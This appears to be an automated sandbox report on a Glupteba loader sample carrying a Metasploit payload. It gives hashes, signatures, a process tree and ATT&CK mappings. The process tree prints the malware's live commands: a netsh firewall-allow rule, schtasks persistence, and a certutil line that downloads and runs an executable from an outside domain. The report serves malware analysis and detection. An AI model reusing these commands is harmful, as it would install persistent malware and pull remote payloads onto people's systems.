Analysis

  • max time kernel
    145s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    08-07-2022 08:56

General

  • Target

    40db28b28e80338262e91d1030b06296abb39ef833495657cc3586c73a0cadb7.exe

  • Size

    3.8MB

  • MD5

    456956a16926bc06109621bd076043fa

  • SHA1

    5d4ab3a741a607055c2e181be350be1191483fc3

  • SHA256

    40db28b28e80338262e91d1030b06296abb39ef833495657cc3586c73a0cadb7

  • SHA512

    ccc1dc220e2a58bd82b8ae26d15c56098a9dda460f2f1b58ebd5bce0bdfafbd60fe8e5773bbbcb5134a94d97c1c44c724d855c76590accbf567ad66cf1da16f3

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 8 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\40db28b28e80338262e91d1030b06296abb39ef833495657cc3586c73a0cadb7.exe
    "C:\Users\Admin\AppData\Local\Temp\40db28b28e80338262e91d1030b06296abb39ef833495657cc3586c73a0cadb7.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4292
    • C:\Users\Admin\AppData\Local\Temp\40db28b28e80338262e91d1030b06296abb39ef833495657cc3586c73a0cadb7.exe
      "C:\Users\Admin\AppData\Local\Temp\40db28b28e80338262e91d1030b06296abb39ef833495657cc3586c73a0cadb7.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3716
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:32
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1016
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:4344
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:3668
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:1584
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:4656
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 680
        3⤵
        • Program crash
        PID:3700
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 624
      2⤵
      • Program crash
      PID:2040
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3144
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4292 -ip 4292
    1⤵
      PID:780
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1032 -ip 1032
      1⤵
        PID:3784

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        456956a16926bc06109621bd076043fa

        SHA1

        5d4ab3a741a607055c2e181be350be1191483fc3

        SHA256

        40db28b28e80338262e91d1030b06296abb39ef833495657cc3586c73a0cadb7

        SHA512

        ccc1dc220e2a58bd82b8ae26d15c56098a9dda460f2f1b58ebd5bce0bdfafbd60fe8e5773bbbcb5134a94d97c1c44c724d855c76590accbf567ad66cf1da16f3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        456956a16926bc06109621bd076043fa

        SHA1

        5d4ab3a741a607055c2e181be350be1191483fc3

        SHA256

        40db28b28e80338262e91d1030b06296abb39ef833495657cc3586c73a0cadb7

        SHA512

        ccc1dc220e2a58bd82b8ae26d15c56098a9dda460f2f1b58ebd5bce0bdfafbd60fe8e5773bbbcb5134a94d97c1c44c724d855c76590accbf567ad66cf1da16f3

      • memory/32-136-0x0000000000000000-mapping.dmp
      • memory/1016-145-0x0000000004B00000-0x0000000005302000-memory.dmp
        Filesize

        8.0MB

      • memory/1016-147-0x0000000000400000-0x00000000025C7000-memory.dmp
        Filesize

        33.8MB

      • memory/1016-146-0x0000000000400000-0x00000000025C7000-memory.dmp
        Filesize

        33.8MB

      • memory/1016-144-0x0000000004600000-0x00000000049A7000-memory.dmp
        Filesize

        3.7MB

      • memory/1016-139-0x0000000000000000-mapping.dmp
      • memory/1032-134-0x0000000000000000-mapping.dmp
      • memory/1032-138-0x0000000000400000-0x00000000025C7000-memory.dmp
        Filesize

        33.8MB

      • memory/1032-143-0x0000000000400000-0x00000000025C7000-memory.dmp
        Filesize

        33.8MB

      • memory/1032-137-0x0000000004491000-0x0000000004838000-memory.dmp
        Filesize

        3.7MB

      • memory/1584-150-0x0000000000000000-mapping.dmp
      • memory/3668-149-0x0000000000000000-mapping.dmp
      • memory/3716-135-0x0000000000000000-mapping.dmp
      • memory/4292-142-0x0000000000400000-0x00000000025C7000-memory.dmp
        Filesize

        33.8MB

      • memory/4292-130-0x000000000470C000-0x0000000004AB3000-memory.dmp
        Filesize

        3.7MB

      • memory/4292-132-0x0000000000400000-0x00000000025C7000-memory.dmp
        Filesize

        33.8MB

      • memory/4292-131-0x0000000004AC0000-0x00000000052C2000-memory.dmp
        Filesize

        8.0MB

      • memory/4292-133-0x000000000470C000-0x0000000004AB3000-memory.dmp
        Filesize

        3.7MB

      • memory/4344-148-0x0000000000000000-mapping.dmp
      • memory/4656-152-0x0000000000000000-mapping.dmp